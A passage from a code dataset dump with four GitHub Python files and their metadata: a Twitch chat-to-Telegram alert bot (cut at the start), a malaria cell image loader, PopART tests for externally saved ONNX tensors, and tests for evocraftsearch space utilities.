CHANNEL + \"\\n\"\n )\n .encode()\n )\n await IRCwrite.drain()\n \n while Connecting:\n try:\n readbuffer_join = await IRCread.read(1024)\n readbuffer_join = readbuffer_join.decode()\n for line in readbuffer_join.split(\"\\n\")[0:-1]:\n if (\"End of /NAMES list\" in line):\n print(f\"{ID} Connected\")\n Connecting = False\n except:\n print(f'{ID} Connect Fail.. 
Retry')\n IRCread, IRCwrite = await asyncio.open_connection(SERVER, PORT)\n IRCwrite.write(\n (\n \"PASS \" + PASSWORD + \"\\n\" +\n \"NICK \" + USERNAME + \"\\n\" +\n \"JOIN #\" + CHANNEL + \"\\n\"\n )\n .encode()\n )\n await IRCwrite.drain()\n \n while True:\n readbuffer = await IRCread.read(1024)\n readbuffer = readbuffer.decode()\n for line in readbuffer.split(\"\\r\\n\"):\n if \"PRIVMSG\" in line:\n separate = line.split(\":\", 2)\n user = separate[1].split(\"!\", 1)[0]\n try:\n message = line.split(\":\", 2)[2]\n except:\n message = \"\"\n if user in isedol_id:\n if user == USERNAME:\n bot.sendMessage(chat_id=TG.chat_id, text= isedol_kr[user] + \":\\n\" + message)\n else:\n bot.sendMessage(chat_id=TG.chat_id, text= isedol_kr[user] + \" → \" + isedol_kr[USERNAME] + \":\\n\" + message)\n elif \"PING\" in line:\n print(f\"Received a PING : {ID}\")\n message = \"PONG tmi.twitch.tv\\r\\n\".encode()\n IRCwrite.write(message)\n await IRCwrite.drain()\n print(\"Sent a PONG\")\n\n# Define execute function\nasync def main():\n print(\"Ready on Notification\")\n await asyncio.gather(run(track[0]), run(track[1]), run(track[2]), run(track[3]), run(track[4])\n , run(track[5]), run(track[6]), run(track[7]), run(track[8]))\n\n# Start\nif __name__ == '__main__':\n asyncio.run(main())", "repo_name": "BakedNut/isedol_twitch_alert_bot", "sub_path": "chat_alert.py", "file_name": "chat_alert.py", "file_ext": "py", "file_size_in_byte": 3432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "connect.ConnectTG", "line_number": 8, "usage_type": "call"}, {"api_name": "asyncio.StreamReader", "line_number": 20, "usage_type": "attribute"}, {"api_name": "asyncio.StreamWriter", "line_number": 21, "usage_type": "attribute"}, {"api_name": "connect.twAPIAutho", "line_number": 22, "usage_type": "attribute"}, {"api_name": "asyncio.open_connection", "line_number": 26, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 47, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 84, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "37479163348", "text": "import os\n\nimport cv2\nfrom keras_preprocessing.image import img_to_array, load_img\n\n\ndef convert_dataset(directory_path):\n data = []\n labels = []\n # loop over the input images\n for image_dir in os.listdir(directory_path):\n potential_dir = os.path.join(directory_path, image_dir)\n if not os.path.isdir(potential_dir):\n continue\n for image_name in os.listdir(potential_dir)[:1000]:\n image_path = os.path.join(directory_path, image_dir, image_name)\n # load the image, pre-process it, and store it in the data list\n try:\n image = cv2.imread(image_path)\n image = img_to_array(image)\n data.append(image)\n # extract the class label from the image path and update the\n # labels list\n label = 1 if image_dir == \"Parasitized\" else 0\n labels.append(label)\n except:\n continue\n return data, labels\n", "repo_name": "Ori-Roza/malaria-cells-classification", "sub_path": "handle_data.py", "file_name": "handle_data.py", "file_ext": "py", "file_size_in_byte": 996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": 
"os.path.isdir", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "keras_preprocessing.image.img_to_array", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "2520539272", "text": "import numpy as np\nimport os\nimport popart\nimport pytest\nimport tempfile\n\n\ndef test_save_tensors_externally():\n d1 = np.array([1, -1, 6]).astype(np.float32)\n d2 = np.array([7, 4]).astype(np.float16)\n builder = popart.Builder()\n i1 = builder.addInitializedInputTensor(d1)\n i2 = builder.addInitializedInputTensor(d2)\n o = builder.aiOnnx.add([i1, i2])\n tmpdir = tempfile.mkdtemp()\n\n def checkFile(file):\n # Check file exists\n assert os.path.exists(file)\n\n # Check file is of expected size: (3 * 4) + (2 * 2) = 16 bytes\n assert os.path.getsize(file) == 16\n\n # Read the binary data back in and check the value is as expected\n assert np.array_equal(np.fromfile(file, dtype=np.float32, count=3), d1)\n assert np.array_equal(\n np.fromfile(file, dtype=np.float16, count=2, offset=12), d2)\n\n # Test GraphTransformer\n tmpfile0 = os.path.join(tmpdir, \"model_tensors0.onnx\")\n graph_transformer = popart.GraphTransformer(builder.getModelProto())\n graph_transformer.saveInitializersExternally([i1, i2], tmpfile0)\n checkFile(tmpfile0)\n\n # Test Builder\n tmpfile1 = os.path.join(tmpdir, \"model_tensors1.onnx\")\n builder.saveInitializersExternally([i1, i2], tmpfile1)\n checkFile(tmpfile1)\n\n\ndef test_try_save_externally_when_already_external():\n builder = popart.Builder()\n i1 = builder.addInitializedInputTensor(np.ones([10], dtype=np.float32))\n tmpdir = tempfile.mkdtemp()\n tmpfile = os.path.join(tmpdir, \"model_tensors.onnx\")\n builder.saveInitializersExternally([i1], tmpfile)\n\n with pytest.raises(popart.popart_exception) as e_info:\n builder.saveInitializersExternally([i1], tmpfile)\n assert \"already has an external data_location\" in e_info.value.args[0]\n\n\ndef test_try_save_non_initializer_externally():\n builder = popart.Builder()\n c = builder.aiOnnx.constant(np.array([1, 6], dtype=np.float32))\n tmpdir = tempfile.mkdtemp()\n tmpfile = os.path.join(tmpdir, \"model_tensors.onnx\")\n\n with pytest.raises(popart.popart_exception) as e_info:\n builder.saveInitializersExternally([c], tmpfile)\n assert \"is not an initializer\" in e_info.value.args[0]\n\n\ndef test_load_externally_saved_tensors():\n \"\"\"\n Test that initializer data can be saved in a separate file, and read into\n the PopART IR in an InferenceSession (by observing an expected inference\n result)\n \"\"\"\n builder = popart.Builder()\n d1 = np.array([1, -1, 6]).astype(np.float32)\n d2 = np.array([-8, 7, 4]).astype(np.float32)\n i1 = builder.addInitializedInputTensor(d1)\n i2 = builder.addInitializedInputTensor(d2)\n o = builder.aiOnnx.add([i1, i2])\n tmpdir = tempfile.mkdtemp()\n tmpfile_tensors = os.path.join(tmpdir, \"tensors.onnx\")\n tmpfile_model = os.path.join(tmpdir, \"model.onnx\")\n builder.saveInitializersExternally([i1, i2], tmpfile_tensors)\n builder.saveModelProto(tmpfile_model)\n\n # Create builder from onnx model\n builder = popart.Builder(tmpfile_model)\n dataFlow = popart.DataFlow(1, {o: popart.AnchorReturnType(\"All\")})\n session = popart.InferenceSession(\n 
fnModel=builder.getModelProto(),\n dataFlow=dataFlow,\n deviceInfo=popart.DeviceManager().createCpuDevice())\n anchors = session.initAnchorArrays()\n session.prepareDevice()\n stepio = popart.PyStepIO({}, anchors)\n session.run(stepio)\n assert (np.array_equal(anchors[o], d1 + d2))\n\n\ndef test_save_back_externally_saved_tensors():\n \"\"\"\n Test that initializers (stored externally in the onnx model) that are\n updated in a training session are written back correctly when the onnx\n model is written using the Session API\n Model:\n in0 -\n \\\n Matmul0 - Matmul1 - out\n / /\n w0 -- w1--\n \"\"\"\n builder = popart.Builder()\n shape = [4, 4]\n elms = np.prod(shape)\n numLayers = 2\n in0 = builder.addInputTensor(popart.TensorInfo(\"FLOAT\", shape))\n initWeights = []\n weightsIds = []\n anchorsDef = {}\n out = in0\n for layer in range(numLayers):\n w_init = np.random.rand(*shape).astype('float32')\n initWeights.append(w_init)\n weightsIds.append(builder.addInitializedInputTensor(w_init))\n anchorsDef[weightsIds[layer]] = popart.AnchorReturnType(\"All\")\n out = builder.aiOnnx.matmul([out, weightsIds[layer]])\n\n loss = builder.aiGraphcore.identityloss([out])\n tmpdir = tempfile.mkdtemp()\n tmpfile_weights = os.path.join(tmpdir, \"weights.onnx\")\n builder.saveInitializersExternally(weightsIds, tmpfile_weights)\n\n # Verify the initial weights are saved correctly\n for layer in range(numLayers):\n saved_weights = np.fromfile(tmpfile_weights,\n dtype=np.float32,\n count=elms,\n offset=layer * elms * 4)\n assert (np.array_equal(initWeights[layer].flatten(), saved_weights))\n\n opts = popart.SessionOptions()\n session = popart.TrainingSession(\n fnModel=builder.getModelProto(),\n dataFlow=popart.DataFlow(1, anchorsDef),\n deviceInfo=popart.DeviceManager().createCpuDevice(),\n optimizer=popart.ConstSGD(10),\n loss=loss)\n\n anchors = session.initAnchorArrays()\n inputs = {in0: np.random.rand(*shape).astype('float32')}\n stepio = popart.PyStepIO(inputs, anchors)\n\n session.prepareDevice()\n session.weightsFromHost()\n\n session.run(stepio)\n\n # Check the weights have been updated\n for layer in range(numLayers):\n assert not np.allclose(anchors[weightsIds[layer]], initWeights[layer])\n\n # Save the model with updated weights back to disk\n tmpfile_model = os.path.join(tmpdir, \"model.onnx\")\n session.modelToHost(tmpfile_model)\n\n # Verify that the file containing tensor data has also been updated\n for layer in range(numLayers):\n saved_weights = np.fromfile(tmpfile_weights,\n dtype=np.float32,\n count=elms,\n offset=layer * elms * 4)\n assert np.array_equal(anchors[weightsIds[layer]].flatten(),\n saved_weights)\n", "repo_name": "shyamalschandra/popart", "sub_path": "tests/popart/external_tensorproto_data_test.py", "file_name": "external_tensorproto_data_test.py", "file_ext": "py", "file_size_in_byte": 6227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 10, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 11, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": 
"attribute"}, {"api_name": "os.path.getsize", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "popart.GraphTransformer", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 48, "usage_type": "call"}, {"api_name": "popart.popart_exception", "line_number": 48, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "popart.popart_exception", "line_number": 59, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 83, "usage_type": "call"}, {"api_name": "popart.DataFlow", "line_number": 84, "usage_type": "call"}, {"api_name": "popart.AnchorReturnType", "line_number": 84, "usage_type": "call"}, {"api_name": "popart.InferenceSession", "line_number": 85, "usage_type": "call"}, {"api_name": "popart.DeviceManager", "line_number": 88, "usage_type": "call"}, {"api_name": "popart.PyStepIO", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 93, "usage_type": "call"}, {"api_name": "popart.Builder", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 110, 
"usage_type": "call"}, {"api_name": "popart.TensorInfo", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "popart.AnchorReturnType", "line_number": 121, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.fromfile", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 135, "usage_type": "call"}, {"api_name": "popart.SessionOptions", "line_number": 137, "usage_type": "call"}, {"api_name": "popart.TrainingSession", "line_number": 138, "usage_type": "call"}, {"api_name": "popart.DataFlow", "line_number": 140, "usage_type": "call"}, {"api_name": "popart.DeviceManager", "line_number": 141, "usage_type": "call"}, {"api_name": "popart.ConstSGD", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 146, "usage_type": "attribute"}, {"api_name": "popart.PyStepIO", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.fromfile", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "15043675557", "text": "from unittest import TestCase\n\nimport torch\nfrom addict import Dict\nfrom evocraftsearch.spaces import TupleSpace, BoxSpace, DiscreteSpace, MultiDiscreteSpace, MultiBinarySpace, DictSpace\nfrom evocraftsearch.spaces import utils\n\n\nclass TestSpace(TestCase):\n def test_flatdim(self):\n space_flatdim_tuples = [\n (DiscreteSpace(3), 3),\n (BoxSpace(low=0., high=float('inf'), shape=(2, 2)), 4),\n (TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]), 15),\n (TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n 7),\n (TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))), 9),\n (MultiDiscreteSpace([2, 2, 100]), 3),\n (MultiBinarySpace(10), 10),\n (DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]),\n dtype=torch.float32)}), 7),\n ]\n for space, flatdim in space_flatdim_tuples:\n dim = utils.flatdim(space)\n assert dim == flatdim, \"Expected {} to equal {}\".format(dim, flatdim)\n\n def test_flatten_space_boxes(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n\n for space in spaces:\n flat_space = 
utils.flatten_space(space)\n assert isinstance(flat_space, BoxSpace), \"Expected {} to equal {}\".format(type(flat_space), BoxSpace)\n flatdim = utils.flatdim(space)\n (single_dim,) = flat_space.shape\n assert single_dim == flatdim, \"Expected {} to equal {}\".format(single_dim, flatdim)\n\n def test_flat_space_contains_flat_points(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n for space in spaces:\n some_samples = [space.sample() for _ in range(10)]\n flattened_samples = [utils.flatten(space, sample) for sample in some_samples]\n flat_space = utils.flatten_space(space)\n for i, flat_sample in enumerate(flattened_samples):\n assert flat_sample in flat_space, 'Expected sample #{} {} to be in {}'.format(i, flat_sample,\n flat_space)\n\n def test_flatten_dim(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n for space in spaces:\n sample = utils.flatten(space, space.sample())\n (single_dim,) = sample.shape\n flatdim = utils.flatdim(space)\n assert single_dim == flatdim, \"Expected {} to equal {}\".format(single_dim, flatdim)\n\n def test_flatten_roundtripping(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n for space in spaces:\n some_samples = [space.sample() for _ in range(10)]\n flattened_samples = [utils.flatten(space, sample) for sample in some_samples]\n roundtripped_samples = [utils.unflatten(space, sample) for sample in flattened_samples]\n for i, (original, roundtripped) in enumerate(zip(some_samples, roundtripped_samples)):\n assert compare_nested(original, roundtripped), \\\n 'Expected sample #{} {} to equal {}'.format(i, original, roundtripped)\n\n\ndef compare_nested(left, right):\n if isinstance(left, torch.Tensor) and isinstance(right, torch.Tensor):\n return torch.allclose(left, right)\n\n elif isinstance(left, Dict) and isinstance(right, Dict):\n res = len(left) == len(right)\n for ((left_key, left_value), (right_key, right_value)) in zip(left.items(), right.items()):\n if not res:\n return False\n res = left_key == right_key and compare_nested(left_value, right_value)\n return res\n elif isinstance(left, 
(tuple, list)) and isinstance(right, (tuple, list)):\n res = len(left) == len(right)\n for (x, y) in zip(left, right):\n if not res:\n return False\n res = compare_nested(x, y)\n return res\n else:\n return left == right\n", "repo_name": "mayalenE/evocraftsearch", "sub_path": "spaces/tests/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 6571, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 12, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 13, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 14, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 14, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 15, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 16, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 18, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 18, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 19, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 20, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 21, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 21, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatdim", "line_number": 26, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 26, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 31, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 32, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 33, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 33, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 34, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 35, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 35, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 36, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 36, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 37, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 38, "usage_type": "call"}, {"api_name": 
"evocraftsearch.spaces.DictSpace", "line_number": 39, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 39, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten_space", "line_number": 44, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 44, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 45, "usage_type": "argument"}, {"api_name": "evocraftsearch.spaces.utils.flatdim", "line_number": 46, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 46, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 52, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 53, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 54, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 54, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 55, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 56, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 56, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 57, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 57, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 58, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 59, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 60, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 60, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten", "line_number": 65, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 65, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.utils.flatten_space", "line_number": 66, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 66, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 73, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 74, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 75, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 75, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 76, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 77, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 77, "usage_type": "call"}, {"api_name": 
"torch.float32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 78, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 78, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 79, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 80, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 81, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 81, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten", "line_number": 85, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 85, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.utils.flatdim", "line_number": 87, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 87, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 92, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 93, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 94, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 94, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 95, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 96, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 97, "usage_type": "call"}, {"api_name": 